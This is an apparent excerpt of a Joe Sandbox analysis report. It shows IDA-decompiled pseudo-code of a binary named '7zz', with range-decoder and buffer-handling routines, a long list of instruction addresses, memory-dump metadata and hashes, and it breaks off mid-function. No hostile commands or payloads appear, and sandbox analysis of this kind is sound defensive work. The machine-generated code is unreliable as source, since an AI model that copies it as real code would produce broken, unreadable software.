															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}












































































                                                                                                                                    0x0045e0c7
                                                                                                                                    0x0045e0cd
                                                                                                                                    0x0045e0d0
                                                                                                                                    0x0045e0d3
                                                                                                                                    0x0045e0d8
                                                                                                                                    0x0045e0db
                                                                                                                                    0x0045e0ee
                                                                                                                                    0x0045e0f3
                                                                                                                                    0x0045e0fc
                                                                                                                                    0x0045e106
                                                                                                                                    0x0045e12e
                                                                                                                                    0x0045e133
                                                                                                                                    0x0045e13a
                                                                                                                                    0x0045e2c6
                                                                                                                                    0x0045e2ca
                                                                                                                                    0x0045e2ce
                                                                                                                                    0x0045e2d0
                                                                                                                                    0x0045e2da
                                                                                                                                    0x0045e2e4
                                                                                                                                    0x0045e300
                                                                                                                                    0x0045e305
                                                                                                                                    0x0045e30c
                                                                                                                                    0x0045e32b
                                                                                                                                    0x0045e32d
                                                                                                                                    0x0045e32f
                                                                                                                                    0x0045e337
                                                                                                                                    0x0045e345
                                                                                                                                    0x0045e361
                                                                                                                                    0x0045e366
                                                                                                                                    0x0045e369
                                                                                                                                    0x0045e36f
                                                                                                                                    0x0045e3d8
                                                                                                                                    0x0045e3dc
                                                                                                                                    0x0045e3de
                                                                                                                                    0x0045e3e8
                                                                                                                                    0x0045e3f2
                                                                                                                                    0x0045e40e
                                                                                                                                    0x0045e413
                                                                                                                                    0x0045e41a
                                                                                                                                    0x0045e420
                                                                                                                                    0x0045e428
                                                                                                                                    0x0045e42a
                                                                                                                                    0x0045e432
                                                                                                                                    0x0045e44e
                                                                                                                                    0x0045e453
                                                                                                                                    0x0045e458
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e45a
                                                                                                                                    0x0045e45a
                                                                                                                                    0x0045e45a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e434
                                                                                                                                    0x0045e438
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e43e
                                                                                                                                    0x0045e444
                                                                                                                                    0x0045e447
                                                                                                                                    0x0045e44a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e44a
                                                                                                                                    0x0045e438
                                                                                                                                    0x0045e41c
                                                                                                                                    0x0045e41c
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e41c
                                                                                                                                    0x0045e3f4
                                                                                                                                    0x0045e3f8
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e3fe
                                                                                                                                    0x0045e404
                                                                                                                                    0x0045e407
                                                                                                                                    0x0045e409
                                                                                                                                    0x0045e40a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e40a
                                                                                                                                    0x0045e3f8
                                                                                                                                    0x0045e371
                                                                                                                                    0x0045e379
                                                                                                                                    0x0045e37d
                                                                                                                                    0x0045e381
                                                                                                                                    0x0045e389
                                                                                                                                    0x0045e3a7
                                                                                                                                    0x0045e3ac
                                                                                                                                    0x0045e3b1
                                                                                                                                    0x0045e45e
                                                                                                                                    0x0045e45e
                                                                                                                                    0x0045e460
                                                                                                                                    0x0045e462
                                                                                                                                    0x0045e466
                                                                                                                                    0x0045e46a
                                                                                                                                    0x0045e472
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e3b7
                                                                                                                                    0x0045e3bd
                                                                                                                                    0x0045e3d5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e3bd
                                                                                                                                    0x0045e38b
                                                                                                                                    0x0045e38f
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e395
                                                                                                                                    0x0045e398
                                                                                                                                    0x0045e3a0
                                                                                                                                    0x0045e3a2
                                                                                                                                    0x0045e3a3
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e3a3
                                                                                                                                    0x0045e38f
                                                                                                                                    0x0045e389
                                                                                                                                    0x0045e347
                                                                                                                                    0x0045e34b
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e351
                                                                                                                                    0x0045e357
                                                                                                                                    0x0045e35a
                                                                                                                                    0x0045e35d
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e35d
                                                                                                                                    0x0045e34b
                                                                                                                                    0x0045e30e
                                                                                                                                    0x0045e30e
                                                                                                                                    0x0045e310
                                                                                                                                    0x0045e318
                                                                                                                                    0x0045e31e
                                                                                                                                    0x0045e478
                                                                                                                                    0x0045e478
                                                                                                                                    0x0045e481
                                                                                                                                    0x0045e49d
                                                                                                                                    0x0045e4a2
                                                                                                                                    0x0045e4a5
                                                                                                                                    0x0045e4ab
                                                                                                                                    0x0045e4c1
                                                                                                                                    0x0045e4c5
                                                                                                                                    0x0045e4c7
                                                                                                                                    0x0045e4cf
                                                                                                                                    0x0045e4eb
                                                                                                                                    0x0045e4f0
                                                                                                                                    0x0045e4f5
                                                                                                                                    0x0045e50d
                                                                                                                                    0x0045e50f
                                                                                                                                    0x0045e511
                                                                                                                                    0x0045e517
                                                                                                                                    0x0045e51c
                                                                                                                                    0x0045e4f7
                                                                                                                                    0x0045e4f9
                                                                                                                                    0x0045e4fe
                                                                                                                                    0x0045e500
                                                                                                                                    0x0045e507
                                                                                                                                    0x0045e507
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e4d1
                                                                                                                                    0x0045e4d5
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e4db
                                                                                                                                    0x0045e4e1
                                                                                                                                    0x0045e4e4
                                                                                                                                    0x0045e4e6
                                                                                                                                    0x0045e4e7
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e4e7
                                                                                                                                    0x0045e4d5
                                                                                                                                    0x0045e4ad
                                                                                                                                    0x0045e4af
                                                                                                                                    0x0045e4b1
                                                                                                                                    0x0045e4b5
                                                                                                                                    0x0045e4b7
                                                                                                                                    0x0045e524
                                                                                                                                    0x0045e524
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e530
                                                                                                                                    0x0045e536
                                                                                                                                    0x0045e552
                                                                                                                                    0x0045e55b
                                                                                                                                    0x0045e560
                                                                                                                                    0x0045e568
                                                                                                                                    0x0045e56a
                                                                                                                                    0x0045e56c
                                                                                                                                    0x0045e562
                                                                                                                                    0x0045e562
                                                                                                                                    0x0045e564
                                                                                                                                    0x0045e564
                                                                                                                                    0x0045e570
                                                                                                                                    0x0045e576
                                                                                                                                    0x0045e580
                                                                                                                                    0x0045e587
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e58d
                                                                                                                                    0x0045e590
                                                                                                                                    0x0045e592
                                                                                                                                    0x0045e592
                                                                                                                                    0x0045e597
                                                                                                                                    0x0045e59b
                                                                                                                                    0x0045e5a2
                                                                                                                                    0x0045e5a2
                                                                                                                                    0x0045e5a9
                                                                                                                                    0x0045e5b0
                                                                                                                                    0x0045e5b0
                                                                                                                                    0x0045e5ba
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e5bc
                                                                                                                                    0x0045e5c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e5c6
                                                                                                                                    0x0045e5cd
                                                                                                                                    0x0045e5d0
                                                                                                                                    0x0045e5d2
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e5d2
                                                                                                                                    0x0045e5c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e5d3
                                                                                                                                    0x0045e5d8
                                                                                                                                    0x0045e5dd
                                                                                                                                    0x0045e5e5
                                                                                                                                    0x0045e5e7
                                                                                                                                    0x0045e5e9
                                                                                                                                    0x0045e5df
                                                                                                                                    0x0045e5df
                                                                                                                                    0x0045e5e1
                                                                                                                                    0x0045e5e1
                                                                                                                                    0x0045e5ed
                                                                                                                                    0x0045e5f2
                                                                                                                                    0x0045e5f8
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e5fe
                                                                                                                                    0x0045e602
                                                                                                                                    0x0045e606
                                                                                                                                    0x0045e625
                                                                                                                                    0x0045e629
                                                                                                                                    0x0045e630
                                                                                                                                    0x0045e636
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e638
                                                                                                                                    0x0045e63a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e640
                                                                                                                                    0x0045e647
                                                                                                                                    0x0045e64a
                                                                                                                                    0x0045e64c
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e64c
                                                                                                                                    0x0045e63a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e64d
                                                                                                                                    0x0045e64d
                                                                                                                                    0x0045e659
                                                                                                                                    0x0045e65b
                                                                                                                                    0x0045e65b
                                                                                                                                    0x0045e668
                                                                                                                                    0x0045e66c
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e608
                                                                                                                                    0x0045e61f
                                                                                                                                    0x0045e671
                                                                                                                                    0x0045e671
                                                                                                                                    0x0045e680
                                                                                                                                    0x0045e684
                                                                                                                                    0x0045e68e
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e690
                                                                                                                                    0x0045e694
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e69a
                                                                                                                                    0x0045e6a1
                                                                                                                                    0x0045e6a4
                                                                                                                                    0x0045e6a6
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e6a6
                                                                                                                                    0x0045e694
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e6a7
                                                                                                                                    0x0045e6ac
                                                                                                                                    0x0045e6b1
                                                                                                                                    0x0045e6b9
                                                                                                                                    0x0045e6bb
                                                                                                                                    0x0045e6bd
                                                                                                                                    0x0045e6b3
                                                                                                                                    0x0045e6b3
                                                                                                                                    0x0045e6b5
                                                                                                                                    0x0045e6b5
                                                                                                                                    0x0045e6c1
                                                                                                                                    0x0045e6c1
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e6c4
                                                                                                                                    0x0045e606
                                                                                                                                    0x0045e5f8
                                                                                                                                    0x0045e578
                                                                                                                                    0x0045e578
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e578
                                                                                                                                    0x0045e538
                                                                                                                                    0x0045e53c
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e542
                                                                                                                                    0x0045e548
                                                                                                                                    0x0045e54b
                                                                                                                                    0x0045e54e
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e54e
                                                                                                                                    0x0045e53c
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e536
                                                                                                                                    0x0045e530
                                                                                                                                    0x0045e483
                                                                                                                                    0x0045e487
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e48d
                                                                                                                                    0x0045e493
                                                                                                                                    0x0045e496
                                                                                                                                    0x0045e499
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e499
                                                                                                                                    0x0045e487
                                                                                                                                    0x0045e481
                                                                                                                                    0x0045e2e6
                                                                                                                                    0x0045e2ea
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e2f0
                                                                                                                                    0x0045e2f6
                                                                                                                                    0x0045e2f9
                                                                                                                                    0x0045e2fb
                                                                                                                                    0x0045e2fc
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e2fc
                                                                                                                                    0x0045e2ea
                                                                                                                                    0x0045e140
                                                                                                                                    0x0045e140
                                                                                                                                    0x0045e14f
                                                                                                                                    0x0045e153
                                                                                                                                    0x0045e15b
                                                                                                                                    0x0045e160
                                                                                                                                    0x0045e162
                                                                                                                                    0x0045e162
                                                                                                                                    0x0045e192
                                                                                                                                    0x0045e192
                                                                                                                                    0x0045e199
                                                                                                                                    0x0045e22c
                                                                                                                                    0x0045e22f
                                                                                                                                    0x0045e234
                                                                                                                                    0x0045e23b
                                                                                                                                    0x0045e236
                                                                                                                                    0x0045e236
                                                                                                                                    0x0045e236
                                                                                                                                    0x0045e244
                                                                                                                                    0x0045e248
                                                                                                                                    0x0045e24d
                                                                                                                                    0x0045e252
                                                                                                                                    0x0045e256
                                                                                                                                    0x0045e25a
                                                                                                                                    0x0045e25c
                                                                                                                                    0x0045e26a
                                                                                                                                    0x0045e274
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e276
                                                                                                                                    0x0045e27e
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e284
                                                                                                                                    0x0045e28a
                                                                                                                                    0x0045e28d
                                                                                                                                    0x0045e290
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e290
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e294
                                                                                                                                    0x0045e299
                                                                                                                                    0x0045e2a0
                                                                                                                                    0x0045e2aa
                                                                                                                                    0x0045e2ac
                                                                                                                                    0x0045e2ae
                                                                                                                                    0x0045e2a2
                                                                                                                                    0x0045e2a2
                                                                                                                                    0x0045e2a4
                                                                                                                                    0x0045e2a6
                                                                                                                                    0x0045e2a6
                                                                                                                                    0x0045e2b2
                                                                                                                                    0x0045e2ba
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e2c0
                                                                                                                                    0x0045e2c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e2c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e2ba
                                                                                                                                    0x0045e19f
                                                                                                                                    0x0045e19f
                                                                                                                                    0x0045e1b0
                                                                                                                                    0x0045e1b4
                                                                                                                                    0x0045e1be
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e1c0
                                                                                                                                    0x0045e1c0
                                                                                                                                    0x0045e1c8
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e1ce
                                                                                                                                    0x0045e1d4
                                                                                                                                    0x0045e1d7
                                                                                                                                    0x0045e1da
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e1da
                                                                                                                                    0x0045e1c8
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e1de
                                                                                                                                    0x0045e1e3
                                                                                                                                    0x0045e1e8
                                                                                                                                    0x0045e1f0
                                                                                                                                    0x0045e1f2
                                                                                                                                    0x0045e1f4
                                                                                                                                    0x0045e1ea
                                                                                                                                    0x0045e1ea
                                                                                                                                    0x0045e1ec
                                                                                                                                    0x0045e1ec
                                                                                                                                    0x0045e1f8
                                                                                                                                    0x0045e200
                                                                                                                                    0x0045e200
                                                                                                                                    0x0045e208
                                                                                                                                    0x0045e208
                                                                                                                                    0x0045e20c
                                                                                                                                    0x0045e212
                                                                                                                                    0x0045e229
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e212
                                                                                                                                    0x0045e199
                                                                                                                                    0x0045e108
                                                                                                                                    0x0045e108
                                                                                                                                    0x0045e110
                                                                                                                                    0x0045e124
                                                                                                                                    0x0045e127
                                                                                                                                    0x0045e12a
                                                                                                                                    0x00000000
                                                                                                                                    0x0045e115
                                                                                                                                    0x0045e115
                                                                                                                                    0x0045e11b
                                                                                                                                    0x0045e11b
                                                                                                                                    0x0045e110
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                                                                    • Instruction ID: e022bf08bd3fa299583df900fa6ce6294aaf835f4f5ad4fca60e15bd747eae71
                                                                                                                                    • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                                                                    • Instruction Fuzzy Hash: 39022972A042118BD71CCE19C580279BBE3FBC5346F110A3FEC9697686D6389A4DCB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00454B10 Relevance: .5, Instructions: 475COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E00454B10(void* __ecx, void* __eflags) {
				void* __edi;
				int _t219;
				unsigned char _t223;
				int _t225;
				int _t227;
				int _t228;
				intOrPtr _t234;
				intOrPtr _t235;
				signed int* _t236;
				signed int _t242;
				int _t245;
				int _t247;
				int _t251;
				signed int _t254;
				intOrPtr _t257;
				signed int _t258;
				void* _t259;
				signed int _t260;
				int _t264;
				int _t267;
				int _t269;
				signed int _t272;
				int _t275;
				int _t277;
				int _t281;
				int _t283;
				int _t287;
				int _t289;
				int _t293;
				int _t295;
				int _t299;
				int _t301;
				signed char _t305;
				signed int _t307;
				signed char _t317;
				signed char _t332;
				int _t349;
				char _t355;
				signed int _t357;
				signed int _t358;
				int _t361;
				signed int _t366;
				int _t391;
				signed int _t406;
				signed int _t421;
				signed int _t431;
				int _t432;
				void* _t433;
				int _t434;
				signed int _t435;
				void* _t436;
				void* _t441;
				intOrPtr _t443;
				void* _t444;

				_push(0xffffffff);
				_push(E00479B9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t443;
				_t444 = _t443 - 0x94;
				_t441 = __ecx;
				E0040DF82(_t444 + 0x1c);
				_t421 = 0;
				 *(_t444 + 0xac) = 0;
				 *((intOrPtr*)(_t444 + 0x40)) = 0;
				 *((intOrPtr*)(_t444 + 0x44)) = 0;
				 *(_t444 + 0x54) = 0;
				 *((intOrPtr*)(_t444 + 0x60)) = 0;
				 *((char*)(_t444 + 0xb0)) = 1;
				if(E0040DF95(_t444 + 0x20, 0x100000) != 0) {
					E0040DFE4(_t444 + 0x1c,  *((intOrPtr*)(_t444 + 0xb4)));
					E0040DFF3(_t444 + 0x1c);
					_t219 = L0040EE76(_t444 + 0x44, 0x100000);
					__eflags = _t219;
					if(_t219 != 0) {
						L0040EEC1(_t444 + 0x40,  *((intOrPtr*)(_t444 + 0xb8)));
						L0040EED0(_t444 + 0x40);
						_t223 =  *((intOrPtr*)(__ecx + 0x18));
						_t317 = _t223 & 0x0000001f;
						_t305 = _t317;
						__eflags = _t305 - 9;
						 *(_t444 + 0x74) = _t305;
						if(_t305 < 9) {
							L81:
							 *(_t444 + 0xac) = 6;
							L0040EEB2(_t444 + 0x40);
							_t225 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t225 - _t421;
							if(_t225 != _t421) {
								 *((intOrPtr*)( *_t225 + 8))(_t225);
							}
							 *(_t444 + 0xac) = 7;
							E0040DFD3(_t444 + 0x1c);
							_t227 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t227 - _t421;
							if(_t227 == _t421) {
								L85:
								_t228 = 1;
								goto L86;
							} else {
								L84:
								 *((intOrPtr*)( *_t227 + 8))(_t227);
								goto L85;
							}
						}
						__eflags = _t305 - 0x10;
						if(_t305 > 0x10) {
							goto L81;
						}
						_t431 = 1 << _t317;
						 *(_t444 + 0x13) = _t223 >> 7;
						__eflags = _t305 -  *((intOrPtr*)(__ecx + 0x1c));
						 *(_t444 + 0x70) = 1;
						if(_t305 !=  *((intOrPtr*)(__ecx + 0x1c))) {
							L17:
							E00454AB0(_t441);
							_t234 = E00458590(_t431 + _t431);
							__eflags = _t234 - _t421;
							 *((intOrPtr*)(_t441 + 0xc)) = _t234;
							if(_t234 != _t421) {
								_t235 = E00458590(_t431);
								__eflags = _t235 - _t421;
								 *((intOrPtr*)(_t441 + 0x10)) = _t235;
								if(_t235 != _t421) {
									_t236 = E00458590(_t431);
									__eflags = _t236 - _t421;
									 *(_t441 + 0x14) = _t236;
									if(_t236 != _t421) {
										 *(_t441 + 0x1c) = _t305;
										L34:
										 *(_t444 + 0x68) = _t421;
										__eflags =  *(_t444 + 0x13);
										 *( *((intOrPtr*)(_t441 + 0xc)) + 0x200) = _t421;
										_t391 = (0 |  *(_t444 + 0x13) != 0x00000000) + 0x100;
										__eflags = _t391;
										 *(_t444 + 0x6c) = _t421;
										_t307 = 9;
										 *(_t444 + 0x18) = _t391;
										 *(_t444 + 0x12) = 0;
										 *(_t444 + 0x14) = _t421;
										 *((char*)( *((intOrPtr*)(_t441 + 0x10)) + 0x100)) = 0;
										while(1) {
											__eflags =  *(_t444 + 0x14) - _t421;
											if( *(_t444 + 0x14) != _t421) {
												goto L50;
											}
											L36:
											_t259 =  *(_t444 + 0x1c);
											__eflags =  *((intOrPtr*)(_t444 + 0x20)) - _t259 - _t307;
											if( *((intOrPtr*)(_t444 + 0x20)) - _t259 < _t307) {
												_t435 = 0;
												__eflags = _t307;
												if(_t307 <= 0) {
													L45:
													_t435 = _t307;
													L46:
													_t406 = _t435 * 8;
													 *(_t444 + 0x14) = _t406;
													_t421 = 0;
													_t260 = L0040EEE8(_t444 + 0x40);
													 *(_t444 + 0x88) = _t260;
													__eflags =  *(_t444 + 0xc4);
													 *(_t444 + 0x8c) = _t406;
													if( *(_t444 + 0xc4) == 0) {
														goto L50;
													}
													_t349 = _t260 -  *(_t444 + 0x68);
													__eflags = _t349;
													asm("sbb esi, [esp+0x6c]");
													 *(_t444 + 0x7c) = _t406;
													if(_t349 != 0) {
														L49:
														 *(_t444 + 0x68) = _t260;
														 *(_t444 + 0x6c) = _t406;
														asm("cdq");
														asm("adc edx, ecx");
														 *((intOrPtr*)(_t444 + 0x80)) =  *(_t444 + 0x1c) -  *((intOrPtr*)(_t444 + 0x24)) +  *((intOrPtr*)(_t444 + 0x2c));
														_t264 =  *(_t444 + 0xc4);
														 *(_t444 + 0x84) = _t406;
														_t432 =  *((intOrPtr*)( *_t264 + 0xc))(_t264, _t444 + 0x84, _t444 + 0x88);
														__eflags = _t432;
														if(_t432 != 0) {
															 *(_t444 + 0xac) = 0xe;
															L0040EEB2(_t444 + 0x40);
															_t267 =  *(_t444 + 0x54);
															 *(_t444 + 0xac) = 0;
															__eflags = _t267;
															if(_t267 != 0) {
																 *((intOrPtr*)( *_t267 + 8))(_t267);
															}
															 *(_t444 + 0xac) = 0xf;
															L74:
															E0040DFD3(_t444 + 0x1c);
															_t247 =  *(_t444 + 0x28);
															 *(_t444 + 0xac) = 0xffffffff;
															__eflags = _t247;
															if(_t247 != 0) {
																 *((intOrPtr*)( *_t247 + 8))(_t247);
															}
															_t228 = _t432;
															goto L86;
														}
														goto L50;
													}
													__eflags = _t349 - 0x40000;
													if(_t349 < 0x40000) {
														goto L50;
													}
													goto L49;
												} else {
													goto L41;
												}
												do {
													L41:
													__eflags = _t259 -  *((intOrPtr*)(_t444 + 0x20));
													if(_t259 <  *((intOrPtr*)(_t444 + 0x20))) {
														goto L44;
													}
													_t269 = E0040E007(_t444 + 0x1c, _t421);
													__eflags = _t269;
													if(_t269 == 0) {
														goto L46;
													}
													_t259 =  *(_t444 + 0x1c);
													L44:
													_t355 =  *_t259;
													_t259 = _t259 + 1;
													 *((char*)(_t444 + _t435 + 0x90)) = _t355;
													_t435 = _t435 + 1;
													__eflags = _t435 - _t307;
